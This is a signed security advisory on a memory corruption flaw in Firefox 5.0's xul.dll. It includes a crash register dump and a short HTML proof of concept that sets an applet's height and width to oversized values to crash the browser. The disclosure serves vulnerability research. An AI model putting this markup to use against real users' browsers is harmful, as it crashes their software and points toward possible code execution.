-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=======================================================================================================
=======================================================================================================
Mozilla Firefox 5.0 xul.dll (ver. 5.0.0.4183) Memory Corruption
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on:
Windows 7 Professional
Info:
It is possible, assigning to "HEIGHT" and\or "WIDTH" parameter a value between 8193 and 9999999, to
corrupt memory.
Succesfully exploitation could lead into arbitrary code execution in the context of the current user.
The error is caused by xul!gfxRect::MoveBy
FAULTING_IP:
xul!gfxRect::MoveBy+56e9
6a0a357e 837e0417 cmp dword ptr [esi+4],17h
which lead here
.text:1059357E cmp dword ptr [esi+4], 17h
and registers are as follow
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [00000004])
----------------------------------------------------------------
EAX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
EDX=060B0CA0: 58 03 CC 6A 01 00 00 00-FF FF FF FF FF FF FF FF
ESP=001CC9A8: E0 2B 3D 08 64 8E 5E 6A-00 00 00 00 F2 8C 4D 6A
EBP=05308BC0: 30 93 C7 6A 00 00 00 00-00 00 00 00 00 00 00 00
ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDI=084EDEC0: 00 93 C7 6A 00 00 00 00-00 00 00 00 03 00 00 00
EIP=6A5E357E: 83 7E 04 17 75 37 57 56-E8 2E F9 FF FF 59 8D BE
--> CMP DWORD PTR [ESI+04],+17
----------------------------------------------------------------
=======================================================================================================
=======================================================================================================
Proof of concept:
<html>
<head>
<applet codebase = test height = 9134752 width = 9134752>
</head>
</html>
=======================================================================================================
=======================================================================================================
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)
iQIcBAEBAgAGBQJOBI5rAAoJEJfnJLqVA1kXukkQAIGd0g3HzG9tsfGnmANBNzFf
PxayzSxBkJetJRMb6WQBX7jYBmXNTesndz+k75sC3xCY4ssjIlbVGWtrn+AmyMLj
hvAKZHyxIvy8kutXE2uTmunKRtzsFE46GCp8TyfUfJpipWp/CyXTTj3LcLsH13ga
KNQ2AdImT+axBRkuw54fhKPMybsaHyj/xHWAqt8XPIRJbZSLdYKH8Eoj6tZQh99U
IoxrdRAVBJ2ZaI3ebDy4TGCjOYYpG5zDA0kcDR0UdROhsDdjY86MPqX2cCSIMIuX
fh09vvPZgpwoyIKpBBJtDXzJW3/EHsk/gOchDfzjrAZrEOZwpgaUi/5le0zSstgh
O49PS5oAQgWu84HWJKQOo/Vh6RJd/Gkee461hU7rVloluh9oqT9qqXe3pazAj+3g
QkhpFx2iF5WAk1L0O+n6PLhATAvpVrLTCDiOUVnzSFxwS3jpZc1SviMAiesKeetn
EDWizszQk8MZFyarbv97A3HqH8zNXWcDubT1XDSQuvVyga0NRUYJFFcDHi6wwC9x
C2VDt6VJoiSdG16M41bO0rB64nkQh/O4wTjawnC1wfJl9/uwxORhnXe2VzwyWozB
cMeSlFP1Jfy3aq7jiye91Rrvhmz6u4FQzsWgDR5jla8hvPb02BdNpdzCyJ0NhxrD
DLxiHma+8Z5cFwRyYJb/
=AMPD
-----END PGP SIGNATURE-----